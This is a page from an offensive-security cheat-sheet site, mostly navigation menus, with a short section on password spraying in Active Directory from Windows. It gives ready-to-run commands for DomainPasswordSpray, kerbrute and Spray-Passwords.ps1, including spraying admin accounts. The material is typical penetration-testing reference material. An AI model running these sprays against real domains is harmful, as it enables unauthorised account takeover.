From Windows - HackFast

Skip to content

HackFast

From Windows

hack-fast/HackFast

HackFast

hack-fast/HackFast

Offensive Security
Offensive Security
- Network
  Network
  - Ports Scanning
    Ports Scanning
    
    Nmap
    
    Masscan
    
    RustScan
  - Services Enumeration
    Services Enumeration
    
    Readme
    
    21 - FTP
    
    22 - SSH
    
    23 - Telnet
    
    25 - SMTP
    
    53 - DNS
    
    110 - POP3
    
    111/135 - RPC
    
    161/162/199 - SNMP
    
    389/636 - LDAP
    
    445 - SMB
    
    1433/1434 - MSSQL
    
    2049 - NFS
    
    3306 - MYSQL
    
    3389 - RDP
    
    5900 - VNC
    
    5985/5986 - WINRM
- Web Application
  Web Application
  - Web Enumeration
    Web Enumeration
    
    Readme
    
    Directory Brute-Forcing
    
    Subdomain Enumeration
    
    Detecting WAF (Web Application Firewall)
    
    Google Dorks
  - Web Exploit
    Web Exploit
    
    Readme
    
    Injections
    Injections
    
    Server Side Injections
    Server Side Injections
    
    SQL Injection (SQLI)
    
    OS Command Injection
    
    NoSQL Injections
    
    LDAP injections
    
    XPath Injections
    
    Server-Side Template Injection (SSTI)
    
    Checklist
    Checklist
    
    SQL Injection (SQLi)
    
    OS Command Injection
    
    NoSQL Injections
    
    LDAP injections
    
    XPath Injections
    
    Server-Side Template Injection (SSTI)
    
    Client Side Injections
    Client Side Injections
    
    Cross-Site Scripting (XSS)
    
    Cross Site Request Forgery (CSRF)
    
    Checklist
    Checklist
    
    Cross-Site Scripting (XSS)
    
    Cross Site Request Forgery (CSRF)
    
    File & File Inclusions
    File & File Inclusions
    
    File Upload
    
    Local File Inclusion (LFI)
    
    Remote Code Execution (RCE)
    
    XML External Entity (XXE)
    
    Checklist
    Checklist
    
    File Upload
    
    Local File Inclusion (LFI)
    
    Remote File Inclusion (RFI)
    
    XML External Entity (XXE)
  - Web Bypassing
    Web Bypassing
    
    Bypassing CAPTCHA
    
    Bypassing CSRF Protection
    
    Bypassing Rate Limit Protection
  - Common Applications
    Common Applications
    
    Readme
    
    PRTG Network Monitor
    
    Apache Tomcat
    
    ColdFusion
    
    Jenkins
    
    GitLab
    
    content management system (CMS)
    content management system (CMS)
    
    WordPress
    
    Drupal
    
    Joomla
- Linux Environment
  Linux Environment
  - Making Shell Fully Interactive
  - File Transfer
    File Transfer
    
    Download Operations
    
    Upload Operations
  - Pivoting, Tunneling, and Port Forwarding
    Pivoting, Tunneling, and Port Forwarding
    
    Pivoting
    Pivoting
    
    Chisel
    
    ICMP Tunneling with ptunnel-ng
    
    Ligolo-ng
    
    Metasploit
    
    SSH
    
    Port Forwarding
    Port Forwarding
    
    Enumeration
    
    Meterpreter Tunneling & Port Forwarding
    
    SSH Port Forwarding
  - Privilege Escalation
    Privilege Escalation
    
    Strategy
    
    System Enumeration
    
    Environment Variables
    Environment Variables
    
    README
    
    LD_LIBRARY_PATH
    
    LD_PRELOAD
    
    Kernel Exploits
    
    Passwords & Keys
    
    Service-Based
    Service-Based
    
    Cron Jobs
    Cron Jobs
    
    README
    
    Hunting Cron Jobs
    
    Exploiting Cron PATH
    
    Wildcard Injection
    
    Exploiting Weak File Permissions
    
    Docker
    
    Logrotate
    
    LXD
    
    Exploiting Sudo Privileges
    
    SUID/SGID Executables
    SUID/SGID Executables
    
    README
    
    Enumerating SUID and SGID
    
    Exploiting Vulnerable SUID
    
    Exploiting PATH Environment Injection
    
    Exploiting Shared Object Injection
    
    Weak File Permissions
    Weak File Permissions
    
    File Permissions
    
    /etc/passwd
    
    /etc/shadow
  - Establishing Persistence
    Establishing Persistence
    
    Add Account
    
    Cron Jobs
    
    SSH Persistence
    
    Startup Scripts
- Windows Environment
  Windows Environment
  - File Transfer
    File Transfer
    
    Download Operations
    
    Upload Operations
  - Pivoting, Tunneling, and Port Forwarding
    Pivoting, Tunneling, and Port Forwarding
    
    Pivoting
    Pivoting
    
    Chisel
    
    Ligolo-ng
    
    Meterpreter
  - Privilege Escalation
    Privilege Escalation
    
    Strategy
    
    System Enumeration
    
    Credential Hunting
    
    Kernel Exploits
    Kernel Exploits
    
    Readme
    
    Enumeration Kernel Vuln
    
    Exploiting Kernel Vuln
    
    Service Exploits
    Service Exploits
    
    Insecure Permissions Executable
    Insecure Permissions Executable
    
    Readme
    
    Service Enumeration
    
    Service Exploitation
    
    Insecure Service Permissions
    Insecure Service Permissions
    
    Readme
    
    Service Enumeration
    
    Service Exploitation
    
    Unquoted Service Paths
    Unquoted Service Paths
    
    Readme
    
    Service Hunting
    
    Service Enumeration
    
    Service Exploitation
    
    Weak Registry Permissions
    Weak Registry Permissions
    
    Registry Enumeration
    
    Registry Exploitation
    
    DLL Hijacking
    
    Token Impersonation
    Token Impersonation
    
    Readme
    
    SeBackupPrivilege/SeRestorePrivilege
    
    SeDebugPrivilege
    
    SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege
    
    SeManageVolumePrivilege
    
    SeTakeOwnershipPrivilege
  - Establishing Persistence
    Establishing Persistence
    
    Code Cave Exploitation
    
    DLL Hijacking
    
    PowerShell Profile
    
    Process Doppelgänging
    
    Registry Keys
    
    Scheduled Tasks
    
    Startup Folder
    
    WMI Event Subscription
  - General
    General
    
    Compiling Exploits
    
    Reverse Shells
    Reverse Shells
    
    MSFvenom
    
    Tricks
    Tricks
    
    Who Logged In and When
- Active Directory
  Active Directory
  - Readme
  - Initial Scanning & Enumeration
    Initial Scanning & Enumeration
    
    Readme
    
    Username Enumeration
    
    ACL Enumeration
    
    Credentialed Enumeration
    Credentialed Enumeration
    
    From Linux
    
    From Windows
    
    Tools
    Tools
    
    Linux
    Linux
    
    BloodHound Queries
    
    CrackMapExec (CME)
    
    Enum4linux
    
    Impacket Toolkit
    
    Windows
    Windows
    
    PowerShell
    
    PowerView
    
    SharpView
  - Initial Attack Vectors
    Initial Attack Vectors
    
    Password Spraying
    Password Spraying
    
    Readme
    
    From Linux
    
    From Windows From Windows
    Table of contents
    
    USING DOMAINPASSWORDSPRAY.PS1
    
    USING KERBRUTE FOR PASSWORD SPRAYING
    
    USING RUNASCS.EXE
    
    LLMNR/NBT-NS Poisoning
    LLMNR/NBT-NS Poisoning
    
    Readme
    
    From Linux
    
    From Windows
    
    Kerberoasting
    Kerberoasting
    
    README
    
    From Linux
    
    From Windows
    
    ASREPRoasting
    ASREPRoasting
    
    README
    
    From Linux
    
    From Windows
    
    DCSync
    DCSync
    
    README
    
    From Linux
    
    From Windows
  - Lateral Movement
    Lateral Movement
    
    Certificate
    
    Kerberos
    
    Mimikatz
    
    MSSQL
    
    NT Hash
    
    Password
  - Domain Persistence
    Domain Persistence
    
    Custom SSP
    
    DCSync
    
    DSRM Abuse
Productivity
Productivity
- todo
Philosophy
Philosophy
- todo
Community
Community

USING DOMAINPASSWORDSPRAY.PS1¶

Import the DomainPasswordSpray module.
Import-Module .\DomainPasswordSpray.ps1
Run the Invoke-DomainPasswordSpray command with the desired password and output file parameters.
Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile spray_success -ErrorAction SilentlyContinue

USING KERBRUTE FOR PASSWORD SPRAYING¶

Execute the password spray attack:
kerbrute passwordspray -d example.local --dc [IP_ADDRESS] valid_users.txt [PASSWORD]

USING RUNASCS.EXE¶

RunasCs.exe can be used to check credentials locally without access to SMB, LDAP, WinRM, Kerberos, or any other authenticated Windows services.
.\RunasCs.exe Administrator notthepassword "cmd /c whoami"

Use spray-passwords.ps1 script: https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1

# test password against all users in the AD, including admins.
PS> .\spray-passwords.ps1 -Admin -Pass IamUser01
PS> .\spray-passwords.ps1 -Admin -Pass IamUser02